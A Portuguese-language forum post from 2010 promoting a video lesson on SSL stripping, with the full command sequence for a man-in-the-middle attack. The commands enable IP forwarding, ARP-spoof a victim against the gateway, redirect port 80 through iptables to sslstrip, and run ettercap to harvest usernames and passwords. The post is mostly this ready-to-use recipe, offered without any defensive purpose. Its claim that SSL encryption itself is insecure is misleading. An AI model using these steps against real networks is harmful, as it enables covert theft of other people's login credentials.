Título: [Video aula] Sniffer SSL - https Publicado por: Bhior en 9 Mayo 2010, 13:00 pm Nesta video vou mostrar como criptografia SSL não e segura. Foi feita um Homem-no-meio (Man In The Middle), redirecionei todo trafego da rede (porta 80), para uma outra porta onde meu micro escutava. O sniffer de SSL (sslstrip), fica escutando na porta e remove o SSL para que não possa voltar para o usuário. O ettercap que executei em "modo texto" só captura o Usuário(username ) e Senha(password).
Programas usados:
Citar kate /etc/etter.conf * Descemente a opção do iptables, tirando o "#" echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 ettercap -T -q -i eth0 sslstrip -a -k -f ettercap -T -q -i eth0 OBS: Se sua internet for wireless no lugar de "eth0" coloca-se "wlan0" Todas os programas são encontrados no backtrack 4 Baixar: Citar http://www.4shared.com/file/9Np1dj7m/Sniffer_SSL.html (http://www.4shared.com/file/9Np1dj7m/Sniffer_SSL.html) Assista on-line:Citar http://blip.tv/file/3525086 Abraços []' |